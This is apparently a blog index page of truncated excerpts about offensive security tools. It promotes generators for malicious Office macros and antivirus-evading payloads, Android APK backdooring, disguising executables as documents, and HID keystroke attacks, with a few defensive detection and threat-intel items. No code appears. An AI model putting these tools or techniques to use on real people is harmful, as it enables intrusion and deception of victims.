Google Chrome is the go-to browser for almost all the Android users. There is, however, one thing that you need to keep in mind when downloading the browsers for your Android phone. Famous for its poor security measures, Google play store has been an example over the past few years and now the IT security […]
PowerShell continues to be the tool of choice for defenders, IT administrators, and hackers. The extensibility, support, and ability to have a full-fledged programming language at your fingertips provides a whole new level of Microsoft’s operating system that was drastically missing in the past. We are huge advocates of PowerShell at Binary Defense, and it […]
Credits Matt Nelson (enigma0x3) – Coded by Matt Nelson (@enigma0x3) DOWNLOAD GENERATE-MACRO https://github.com/enigma0x3/Generate-Macro This Powershell script will generate a malicious Microsoft Office document with a specified payload and persistence method. SYNOPSIS Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. [!] This script […]
Meterpreter_Payload_Detection.exe tool for detecting Meterpreter in memory like IPS-IDS and Forensics tool DOWNLOAD Meterpreter_Payload_Detection https://github.com/DamonMohammadbagher/Meterpreter_Payload_Detection CREDITS: DamonMohammadbagher Install Notes Download Meterpreter_Payload_Detection Compile C#code or unzip release_v1.0.0.4 Run Meterpreter_Payload_Detection.exe If you liked this software please consider leaving a star and folking the software from github. C# code Author : Damon Mohammadbagher Meterpreter Signature Authors : Rohan […]
Insanity-Framework to Generate Payloads and Control Remote Machines. Insanity-Framework ** VERSION 1.6 RELEASED !!! ** * Copyright 2017 Insanity Framework (IF) Written by: * Alisson Moretto – 4w4k3 Special Thanks to Thomas Perkins – Ekultek Insanity Payload consists of encrypting your code and decrypting it in memory, thus avoiding a possible av signature, also has […]
Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address. in this article i want to explain how can use IPv6 Address (AAAA) records in DNStraffic for Transferring Payloads. In my previous Article I explained how can use DNS and PTR Records , now We should talk about AAAA records . This article has 2 Parts […]
In this tutorial I will show you how to use TheFatRat to generate a Undetectable payload (FUD) to gain remote access to a Windows Operating System. What is TheFatRat ?. TheFatRat is a easy tool to generate backdoor’s with msfvenom (a part from metasploit framework) and easy post exploitation attack. This tool compiles a malware […]
Embed a Metasploit Payload in an original Android Apk. Welcome back in the last part of the Android Hacking Series we discussed how to create a malicious payload to Hack Android Phones. Today you will learn how to make your malicious Android APK more convincing by injecting a hook of our payload into an original […]
With the dynamics of persuasion that prove effective in a pentest, several painstaking means of making a payload has emerged, Insanity Framework provides speed and effectiveness in a single tool. Note: Insanity Payloads can delay 1 minute to connect, this is necessary for bypass more avs and sandboxes. DISCLAIMER: “DISCLAIMED. IN NO EVENT SHALL THE […]
Simple script that allow users to add a ms-word icon to one existing executable.exe (using resource-hacker as backend appl) and a ruby one-liner command that will hidde the .exe extension and add the word doc .ppt extension to the end of the file name. Version release: v1.5-Stable Distros Supported: Linux Kali, Ubuntu, Mint Author: pedro […]
PowerShell is an amazing post-exploitation tool available to the attacker during engagements in Windows environments. Tools like PowerSploit or PowerShell Empire help out a lot during internal test. Problem is, restrictive execution policy is enabled by default on windows machines which makes it problematic to run ps1 scripts. Not having admin rights on the target […]
Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target’s […]
One of the most complex tasks for the cybercriminals is to ensure their malicious code goes undetected by antivirus and achieves its goal. For this, they have invested a lot on more complex infection processes, going beyond the traditional phishing and using techniques where the malicious payload is hidden in encrypted files – even using […]
FireEye Threat Intelligence analysts have discovered a new phishing attack carried by a Chinese group using legitimate service like dropbox. Analysts found the cyber group (which is unnamed at the moment but some researchers term them as “admin@338”) sending emails with links to dropbox containing documents. The documents in reality were having payload malware known […]